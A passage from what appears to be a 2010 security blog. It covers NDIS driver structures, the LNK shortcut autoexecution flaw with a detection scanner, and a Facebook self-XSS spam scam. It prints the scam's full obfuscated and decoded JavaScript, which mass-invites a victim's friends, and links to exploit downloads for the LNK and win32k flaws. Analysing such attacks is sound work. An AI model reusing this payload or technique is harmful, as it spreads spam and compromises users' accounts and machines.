// Header.Size = NDIS_SIZEOF_OID_REQUEST_REVISION_1<br />
//<br />
NDIS_OBJECT_HEADER Header;<br />
NDIS_REQUEST_TYPE RequestType;<br />
NDIS_PORT_NUMBER PortNumber;<br />
UINT Timeout; // in Seconds<br />
PVOID RequestId;<br />
NDIS_HANDLE RequestHandle;<br />
<br />
//<br />
// OID - Information<br />
//<br />
union _REQUEST_DATA<br />
{<br />
struct _QUERY<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
UINT InformationBufferLength;<br />
UINT BytesWritten;<br />
UINT BytesNeeded;<br />
} QUERY_INFORMATION;<br />
<br />
struct _SET<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
UINT InformationBufferLength;<br />
UINT BytesRead;<br />
UINT BytesNeeded;<br />
} SET_INFORMATION;<br />
<br />
struct _METHOD<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
ULONG InputBufferLength;<br />
ULONG OutputBufferLength;<br />
ULONG MethodId;<br />
UINT BytesWritten;<br />
UINT BytesRead;<br />
UINT BytesNeeded;<br />
} METHOD_INFORMATION;<br />
} DATA;<br />
//<br />
// NDIS Reserved<br />
//<br />
UCHAR NdisReserved[NDIS_OID_REQUEST_NDIS_RESERVED_SIZE * sizeof(PVOID)];<br />
UCHAR MiniportReserved[2*sizeof(PVOID)];<br />
UCHAR SourceReserved[2*sizeof(PVOID)];<br />
UCHAR SupportedRevision;<br />
UCHAR Reserved1;<br />
USHORT Reserved2;<br />
<br />
}NDIS_OID_REQUEST, *PNDIS_OID_REQUEST;</span></blockquote><ul><li><b>E1G60I32!E1000Request</b> > <b>_E1000QueryInformationSafe</b>(MiniportAdapterContext, Oid, InformationBuffer, InformationBufferLength, &BytesWritten, &BytesNeeded) </li>
<li>The following OIDs are checked:</li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">#define OID_GEN_XMIT_OK 0x00020101<br />
#define OID_GEN_RCV_OK 0x00020102<br />
#define OID_GEN_STATISTICS 0x00020106</span></blockquote><ul><li><b>OID_GEN_STATISTICS</b> is the OID used to obtain an adapter's statistics on NDIS 6.0 and later</li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">typedef struct _NDIS_STATISTICS_INFO {<br />
 NDIS_OBJECT_HEADER Header; <span style="color: lime;">// 0x00</span><br />
 ULONG SupportedStatistics; <span style="color: lime;">// 0x04</span><br />
 ULONG64 ifInDiscards; <span style="color: lime;">// 0x08</span><br />
 ULONG64 ifInErrors; <span style="color: lime;">// 0x10</span><br />
 ULONG64 ifHCInOctets; <span style="color: lime;">// 0x18</span><br />
 ULONG64 ifHCInUcastPkts; <span style="color: lime;">// 0x20</span><br />
 ULONG64 ifHCInMulticastPkts; <span style="color: lime;">// 0x28</span><br />
 ULONG64 ifHCInBroadcastPkts; <span style="color: lime;">// 0x30</span><br />
 ULONG64 ifHCOutOctets; <span style="color: lime;">// 0x38</span><br />
 ULONG64 ifHCOutUcastPkts; <span style="color: lime;">// 0x40</span><br />
 ULONG64 ifHCOutMulticastPkts; <span style="color: lime;">// 0x48</span><br />
 ULONG64 ifHCOutBroadcastPkts; <span style="color: lime;">// 0x50</span><br />
 ULONG64 ifOutErrors; <span style="color: lime;">// 0x58</span><br />
 ULONG64 ifOutDiscards; <span style="color: lime;">// 0x60</span><br />
 ULONG64 ifHCInUcastOctets; <span style="color: lime;">// 0x68</span><br />
 ULONG64 ifHCInMulticastOctets; <span style="color: lime;">// 0x70</span><br />
 ULONG64 ifHCInBroadcastOctets; <span style="color: lime;">// 0x78</span><br />
 ULONG64 ifHCOutUcastOctets; <span style="color: lime;">// 0x80</span><br />
 ULONG64 ifHCOutMulticastOctets; <span style="color: lime;">// 0x88</span><br />
 ULONG64 ifHCOutBroadcastOctets; <span style="color: lime;">// 0x90</span><br />
} NDIS_STATISTICS_INFO, *PNDIS_STATISTICS_INFO;</span></blockquote><br />
<span style="color: blue; font-size: x-large;">Demo</span><br />
<br />
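Before the demo screenshots, an added example (not code from the original post) for the Extra Note above: this C program overlays the 32-bit NDIS_OID_REQUEST layout listed there onto the dd 8948c1a8 dump and extracts the fields a hooked OidRequestHandler would see, namely the request type and the OID (OID_GEN_RCV_OK here). It assumes little-endian x86 memory with 4-byte pointers; the header constants and the NDIS_REQUEST_TYPE enum values come from the WDK's ndis.h rather than from the post, the oid_request_prefix_t and summary types are this example's own, and the malformed sample is constructed.

```c
/* Added example, not from the original post: overlay the 32-bit
 * NDIS_OID_REQUEST layout the post lists onto its `dd 8948c1a8` dump and
 * pull out the fields an OidRequestHandler hook would see. Only 64 bytes are
 * in the dump, so only the prefix up to the DATA union is copied. The
 * constants below come from the WDK's ndis.h, not from the post. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NDIS_OBJECT_TYPE_OID_REQUEST        0x96  /* Header.Type for an OID request */
#define NDIS_OID_REQUEST_REVISION_1         1
#define NDIS_SIZEOF_OID_REQUEST_REVISION_1  0x8c  /* full struct size on x86 */

/* NDIS_REQUEST_TYPE values, in WDK enum order. */
enum { NdisRequestQueryInformation = 0, NdisRequestSetInformation = 1,
       NdisRequestQueryStatistics = 2 };

typedef struct { uint8_t Type; uint8_t Revision; uint16_t Size; } ndis_object_header_t;

/* Prefix of NDIS_OID_REQUEST as laid out on 32-bit Windows (example's own type). */
typedef struct {
    ndis_object_header_t Header;
    uint32_t RequestType;
    uint32_t PortNumber;
    uint32_t Timeout;        /* in seconds */
    uint32_t RequestId;      /* PVOID on x86 */
    uint32_t RequestHandle;  /* NDIS_HANDLE on x86 */
    union {
        struct { uint32_t Oid, InformationBuffer, InformationBufferLength,
                 BytesWritten, BytesNeeded; } QUERY_INFORMATION;
        struct { uint32_t Oid, InformationBuffer, InformationBufferLength,
                 BytesRead, BytesNeeded; } SET_INFORMATION;
    } DATA;
} oid_request_prefix_t;

typedef struct {
    uint8_t type, revision;
    uint16_t size;
    uint32_t request_type, oid, info_buffer, info_length;
} oid_request_summary_t;

/* Decode n dwords of a dumped request. Returns 0 on success, -1 if the dump
 * is too short for the prefix, -2 if the header is not a revision-1 OID
 * request (the condition the post's header comment says the caller must set). */
int decode_oid_request(const uint32_t *dwords, size_t n, oid_request_summary_t *out)
{
    oid_request_prefix_t req;
    if (n * sizeof(uint32_t) < sizeof req)
        return -1;
    memcpy(&req, dwords, sizeof req);
    if (req.Header.Type != NDIS_OBJECT_TYPE_OID_REQUEST ||
        req.Header.Revision != NDIS_OID_REQUEST_REVISION_1 ||
        req.Header.Size < NDIS_SIZEOF_OID_REQUEST_REVISION_1)
        return -2;
    out->type = req.Header.Type;
    out->revision = req.Header.Revision;
    out->size = req.Header.Size;
    out->request_type = req.RequestType;
    /* QUERY_INFORMATION and SET_INFORMATION share their first three fields. */
    out->oid = req.DATA.QUERY_INFORMATION.Oid;
    out->info_buffer = req.DATA.QUERY_INFORMATION.InformationBuffer;
    out->info_length = req.DATA.QUERY_INFORMATION.InformationBufferLength;
    return 0;
}

/* The 16 dwords from the post's `dd 8948c1a8` output. */
static const uint32_t kRequestDump[16] = {
    0x008c0196, 0x00000002, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00020102, 0x838335d8,
    0x00000008, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x85367ac0, 0x85367ac0,
};

/* Constructed sample: same dump with Header.Type changed to 0x80
 * (NDIS_OBJECT_TYPE_DEFAULT), so it must be rejected. */
static const uint32_t kBadHeaderDump[16] = {
    0x008c0180, 0x00000002, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00020102, 0x838335d8,
    0x00000008, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x85367ac0, 0x85367ac0,
};

/* Status of decoding n dwords of d, without keeping the fields. */
int decode_status(const uint32_t *d, size_t n)
{
    oid_request_summary_t s;
    return decode_oid_request(d, n, &s);
}

/* Decoded fields of the post's dump (all zero if decoding fails). */
oid_request_summary_t sample_summary(void)
{
    oid_request_summary_t s = {0};
    decode_oid_request(kRequestDump, 16, &s);
    return s;
}
```

Header 0x008c0196 decodes to Type 0x96, Revision 1, Size 0x8c, and RequestType 2 is NdisRequestQueryStatistics, which matches the statistics path described in the note.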
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s1600/vista_utltimate_rc-2010-12-02-22-16-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s320/vista_utltimate_rc-2010-12-02-22-16-25.png" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s1600/vista_utltimate_rc-2010-12-02-22-16-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s320/vista_utltimate_rc-2010-12-02-22-16-44.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABtvkTwY459eSgkmmByDmViuH941rVNccYUnqTz0wZSDSNM1RNAAJSNyuLXCDiGjjbiFVYTbtOF-H7D8e-OCO9tt2wOvApfF6972lFeqfyWSiZOyNRYka4OpqLc3AVn37EK0j_2I9bIP2/s1600/vista_utltimate_rc-2010-12-02-22-14-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABtvkTwY459eSgkmmByDmViuH941rVNccYUnqTz0wZSDSNM1RNAAJSNyuLXCDiGjjbiFVYTbtOF-H7D8e-OCO9tt2wOvApfF6972lFeqfyWSiZOyNRYka4OpqLc3AVn37EK0j_2I9bIP2/s320/vista_utltimate_rc-2010-12-02-22-14-54.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><br />
Signing off @x9090<br />
<br />
<span style="color: blue; font-size: x-large;">win32!NtGdiEnableEudc Vulnerability & POC on Windows Vista/7</span> (x9090, 2010-11-26)<br />
<br />
There is a new 0-day vulnerability in win32k.sys on Windows Vista/7, found by a Chinese hacker with the nickname 'noobpwnftw'.<br />
<br />
The vulnerability was published on a well-known programming website but has since been taken down. For the sake of education and research, I'll post a local copy here.<br />
<br />
Have fun! :)<br />
<br />
<a href="http://www.4shared.com/file/TH0lfOd7/Bypassing_UAC_with_User_Privil.html">Download here</a><br />
<br />
Email me for the archive's password.<br />
<br />
<a href="http://i65.photobucket.com/albums/h223/nofear0720/cooltext66147613.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="25" src="http://i65.photobucket.com/albums/h223/nofear0720/cooltext66147613.gif" width="200" /></a><br />
<br />
Signing off @x9090<br />
<br />
<span style="color: blue; font-size: x-large;">Microsoft Shortcut LNK Autoexecution Vulnerability</span> (x9090, 2010-07-25)<br />
<br />
This is a new USB infection vector that uses an LNK (shortcut) vulnerability affecting <b>all</b> Windows platforms.<br />
<br />
The interesting thing about this vulnerability is that AutoPlay no longer needs to be enabled: merely browsing to the folder, so that Explorer parses the shortcut to display its icon, is enough to run the specified program ;) See the demo below.<br />
<br />
Before we proceed, let's look at the LNK file format, which is the culprit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEbeY4b5jdTJ5vwpD2YuHLV8K_hyphenhyphen7IYYEfHAFAunG98SU6L7TAduspxejAbYIY9i7-HABY_fUqutC7XpI_jmuCTkyzZpBofk61M4cj8DtKKrk7X1XFF-Ku3TTAZuT_Tia_bXs7C4MM3Ze/s1600/lnk_file_format.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEbeY4b5jdTJ5vwpD2YuHLV8K_hyphenhyphen7IYYEfHAFAunG98SU6L7TAduspxejAbYIY9i7-HABY_fUqutC7XpI_jmuCTkyzZpBofk61M4cj8DtKKrk7X1XFF-Ku3TTAZuT_Tia_bXs7C4MM3Ze/s320/lnk_file_format.bmp" /></a></div><br />
The <span style="color: lime;">GREEN region</span> is the <b>SHELL_ITEM_LIST</b> (the link target ID list, a chain of <b>SHITEMID</b> structures documented on MSDN); the target's file location comes after the <b>SHITEMID</b> headers. Notice the shell CLSIDs for My Computer and Control Panel in the <span style="color: lime;">GREEN region</span>:<br />
<br />
<b>My Computer: </b>{20d04fe0-3aea-1069-a2d8-08002b30309d}<br />
<b>Control Panel: </b>{21ec2020-3aea-1069-a2dd-08002b30309d}<br />
<br />
These item IDs are resolved by shell32.dll, and that is what causes the autoexecution: when Explorer renders the shortcut's icon it treats the target as a Control Panel item and loads the referenced .cpl (which can be any DLL) into its own process with LoadLibrary to fetch the icon, so the DLL's entry point runs without a click and without AutoPlay. For more technical detail on how the autoexecution happens, see the debug screenshot from <i>ivanlef0u</i>, who was the first to post this exploit publicly ;) Check this out: <a href="http://www.exploit-db.com/exploits/14403/">http://www.exploit-db.com/exploits/14403/</a><br />
<br />
Microsoft's workaround for this 0-day vulnerability (the fix itself shipped later as MS10-046): <a href="http://support.microsoft.com/kb/2286198">http://support.microsoft.com/kb/2286198</a><br />
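As an added worked example (not part of the original post), here is a small scanner that parses the LinkTargetIDList described above and flags the CVE-2010-2568 pattern: a Control Panel folder item followed by an applet path that is not a genuine applet under %SystemRoot%\system32. The ShellLinkHeader and ItemIDList layouts follow MS-SHLLINK; the inner byte layout of the control-panel items in the constructed sample shortcut, the "not under system32" heuristic and the hard-coded C:\Windows path are assumptions made for the demo.<br />

```python
"""Added example, not code from the original post: parse a shortcut's
LinkTargetIDList (MS-SHLLINK) and flag the CVE-2010-2568 pattern, i.e. a
Control Panel folder item followed by a UTF-16 path to a .dll/.cpl that does
not live under %SystemRoot%\\system32. Header and ID-list layouts follow
MS-SHLLINK; the inner layout of the control-panel items in build_sample_lnk()
is modelled loosely on the public PoC and is an assumption for the demo."""
import struct
import uuid

LINK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")   # ShellLinkHeader.LinkCLSID
MY_COMPUTER = uuid.UUID("20D04FE0-3AEA-1069-A2D8-08002B30309D")
CONTROL_PANEL = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D")
HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST = 0x1                                     # LinkFlags bit 0
SYSTEM32 = "c:\\windows\\system32\\"     # assumption: %SystemRoot% is C:\Windows


def parse_header(data):
    """Validate ShellLinkHeader (HeaderSize, LinkCLSID) and return LinkFlags."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != HEADER_SIZE or uuid.UUID(bytes_le=clsid) != LINK_CLSID:
        raise ValueError("not a .lnk: bad HeaderSize or LinkCLSID")
    return flags


def parse_id_list(data, offset):
    """Return the data bytes of every ItemID in the LinkTargetIDList at offset."""
    (id_list_size,) = struct.unpack_from("<H", data, offset)
    pos, end, items = offset + 2, offset + 2 + id_list_size, []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:                     # TerminalID
            break
        if item_size < 2 or pos + item_size > end:
            raise ValueError("corrupt ItemID size")
        items.append(data[pos + 2:pos + item_size])
        pos += item_size
    return items


def utf16_strings(blob, min_chars=4):
    """Pull printable-ASCII UTF-16LE runs out of an undocumented item blob."""
    found = []
    for align in (0, 1):
        run = []
        for i in range(align, len(blob) - 1, 2):
            if blob[i + 1] == 0 and 0x20 <= blob[i] < 0x7F:
                run.append(chr(blob[i]))
                continue
            if len(run) >= min_chars:
                found.append("".join(run))
            run = []
        if len(run) >= min_chars:
            found.append("".join(run))
    return found


def scan_lnk(data):
    """Return (saw Control Panel CLSID, [applet paths found in later items])."""
    if not parse_header(data) & HAS_LINK_TARGET_ID_LIST:
        return False, []
    cp_seen, paths = False, []
    for item in parse_id_list(data, HEADER_SIZE):
        if CONTROL_PANEL.bytes_le in item:
            cp_seen = True
        elif cp_seen:
            paths += [s for s in utf16_strings(item) if s.lower().endswith((".dll", ".cpl"))]
    return cp_seen, paths


def is_suspicious(data):
    """CVE-2010-2568 heuristic: a Control Panel item whose applet is not a real one."""
    cp_seen, paths = scan_lnk(data)
    return cp_seen and any(not p.lower().startswith(SYSTEM32) for p in paths)


def build_sample_lnk(applet_path):
    """Constructed sample (not a real-world file): header + a three-item ID list."""
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID.bytes_le, HAS_LINK_TARGET_ID_LIST)
    header += bytes(HEADER_SIZE - len(header))          # attributes, timestamps... left zero

    def item(payload):
        return struct.pack("<H", len(payload) + 2) + payload

    root = item(b"\x1f\x50" + MY_COMPUTER.bytes_le)      # root folder item, documented
    cpanel = item(b"\x2e\x80" + CONTROL_PANEL.bytes_le)  # assumption: PoC-style folder item
    applet = item(bytes(16) + applet_path.encode("utf-16-le") + b"\x00\x00")
    id_list = root + cpanel + applet + b"\x00\x00"       # TerminalID
    return header + struct.pack("<H", len(id_list)) + id_list


if __name__ == "__main__":
    for path in (r"\\10.0.0.5\share\x.dll", r"C:\Windows\system32\timedate.cpl"):
        print(path, "->", "SUSPICIOUS" if is_suspicious(build_sample_lnk(path)) else "ok")
```

Run it directly to see the two verdicts; for real files call scan_lnk(open(path, 'rb').read()) and treat any applet path on a UNC share or removable drive as a strong indicator, since a legitimate Control Panel shortcut has no reason to point there.<br />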
<br />
<b><span style="font-size: large;">Demo Video</span></b><br />
<br />
<span style="font-size: small;">This demo is a simple one, mostly based on <i>ivanlef0u's</i> with some minor modifications. The DLL is simple enough that I include its source code in the attachment section. Have fun :)</span><br />
<br />
<div style="text-align: center;"><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/nrDIrvodEo0&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/nrDIrvodEo0&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div><br />
<b><span style="font-size: large;">Attachment</span></b><br />
<br />
<span style="font-size: small;">Executable files: <a href="http://www.4shared.com/file/162tMLPu/mytest.html">Bin</a></span><br />
<span style="font-size: small;">Simple DLL & LNK file: <a href="http://www.4shared.com/file/_tl6WkdN/CplApplet_LNK.html">Src</a></span><br />
<br />
<br />
<b><span style="font-size: large;">Reference</span></b><br />
<br />
[1] <a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx">http://www.microsoft.com/technet/security/advisory/2286198.mspx</a> -- <i>Microsoft Advisory, CVE-2010-2568</i><br />
<br />
[2] <a href="http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html">http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html</a> -- <i>Shortcut LNK File Format</i><br />
<br />
[3] <a href="http://msdn.microsoft.com/en-us/library/bb759800%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/bb759800%28VS.85%29.aspx</a> -- <i>SHITEMID Structure</i><br />
<br />
[4] <a href="http://www.symantec.com/connect/blogs/w32stuxnet-installation-details">http://www.symantec.com/connect/blogs/w32stuxnet-installation-details</a> -- <i>Symantec Stuxnet Technical Info - Part I</i><br />
<br />
[5] <a href="http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components">http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components</a> -- <i>Symantec Stuxnet Technical Info - Part II</i><br />
<br />
[6] <a href="http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml">http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml</a> -- <i>F-Secure Stuxnet Description</i><br />
<br />
Signing off @x9090<br />
<br />
<b><span style="font-size: large;">Facebook Spam</span></b> (2010-05-17)<br />
<br />
Three days ago I received an email from the Facebook team, sent by an old friend whom I have not met since we graduated from university. I was a bit curious about what he wanted to send me (to be honest, I was attracted by the email subject ^_^):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqcyPkGsHXscfh430o6_WAQOWprk8NI_d-xOmYnza8_4yMWYHpZDQGqEt4X3kkNoXXoqVpBpOG8n2PQhuPCV1dhm15QSd2Z-V7Cwug0XC7P98HS5xZi5zXgjW2pFLXf6liITUmglf6JEq/s1600/My_Gmail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqcyPkGsHXscfh430o6_WAQOWprk8NI_d-xOmYnza8_4yMWYHpZDQGqEt4X3kkNoXXoqVpBpOG8n2PQhuPCV1dhm15QSd2Z-V7Cwug0XC7P98HS5xZi5zXgjW2pFLXf6liITUmglf6JEq/s640/My_Gmail.png" width="640" /></a></div><br />
Unfortunately I can't give you a screenshot of what the page really looks like. The page shows a naked couple hugging, with the important parts hidden, of course :). I know that is hard to picture from words alone, so please use your imagination ;)<br />
<br />
The main part of the scam is a combo box containing JavaScript text, together with instructions on how to copy and paste that code into your browser so that you can see the naked couple. This is the classic "self-XSS" trick: the victim is talked into running the attacker's script inside their own logged-in Facebook session, so no vulnerability in Facebook is needed at all. The script looks like this:<br />
<br />
<blockquote><span style="color: yellow;">javascript:(function(){a='app118802484821085_YCbbZr';b='app118802484821085_ZKOHsY';qDDgEj='app118802484821085_qDDgEj';ZsMtqA='app118802484821085_ZsMtqA';nQMzbQ='app118802484821085_nQMzbQ';eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|nQMzbQ|fs|SocialGraphManager|ZsMtqA|qDDgEj|||||||'.split('|'),0,{}))})();</span></blockquote><br />
Looking at this obfuscated JavaScript, I decided not to trust my friend's message and instead debugged the script to see what it actually does. Here is the result after removing the first layer of obfuscation (the p,a,c,k,e,r packer):<br />
<br />
<br />
<blockquote style="color: yellow;">var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];<br />
d=document;<br />
d[_0x95ea[2]](nQMzbQ)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];<br />
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];<br />
s=d[_0x95ea[2]](_0x95ea[6]);<br />
m=d[_0x95ea[2]](_0x95ea[7]);<br />
c=d[_0x95ea[9]](_0x95ea[8]);<br />
c[_0x95ea[11]](_0x95ea[10],true,true);<br />
s[_0x95ea[12]](c);<br />
setTimeout(function(){fs[_0x95ea[13]]()},5000);<br />
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);<br />
setTimeout(function(){m[_0x95ea[12]](c);<br />
d[_0x95ea[2]](ZsMtqA)[_0x95ea[4]]=d[_0x95ea[2]](qDDgEj)[_0x95ea[5]]},5000);</blockquote><br />
It is now fairly easy to understand what the script does. After substituting the elements of the <b>_0x95ea</b> array, the final script looks like this:<br />
<br />
<blockquote style="color: yellow;">a='app118802484821085_YCbbZr';<br />
b='app118802484821085_ZKOHsY';<br />
qDDgEj='app118802484821085_qDDgEj';<br />
ZsMtqA='app118802484821085_ZsMtqA';<br />
nQMzbQ='app118802484821085_nQMzbQ'<br />
var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest", "likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form", "/ajax/social_graph/invite_dialog.php","submitDialog"];<br />
d = document;<br />
d['getElementById'](nQMzbQ)['style']['visibility'] = 'hidden';<br />
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];<br />
s = d['getElementById']('suggest');<br />
m = d['getElementById']('likeme');<br />
c = d['createEvent']('MouseEvents');<br />
c['initEvent']('click', true, true);<br />
s['dispatchEvent'](c);<br />
setTimeout(function () {<br />
fs['select_all']()<br />
}, 5000);<br />
setTimeout(function () {<br />
SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')<br />
}, 5000);<br />
setTimeout(function () {<br />
m['dispatchEvent'](c);<br />
d['getElementById'](ZsMtqA)['innerHTML'] = d['getElementById'](qDDgEj)['value']<br />
}, 5000);</blockquote><br />
It is a script that drives Facebook's own page rather than any API: it hides one element, clicks the <b>suggest</b> button, calls <b>fs.select_all()</b> to tick every friend in the invite dialog, then submits the dialog through <b>SocialGraphManager.submitDialog</b> to /ajax/social_graph/invite_dialog.php, which suggests the application (app ID 118802484821085, visible in the element names) to everyone on your friends list; finally it clicks the <b>likeme</b> element. Because it runs inside the victim's own logged-in session it needs no credentials, and every friend who follows the same instructions spreads the invitation further.<br />
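As an added example (not part of the original post), the following Python undoes both layers statically, the way an analyst would rather than pasting the script into a browser: the packer layer is decoded by re-implementing its e() function and doing the same single-pass word substitution the packer's decoder performs, and the _0x95ea string-array layer is resolved by decoding the \xHH escapes and inlining each index. The packed sample inside the block is a constructed miniature in the same style as the script above, not the full spam script.<br />

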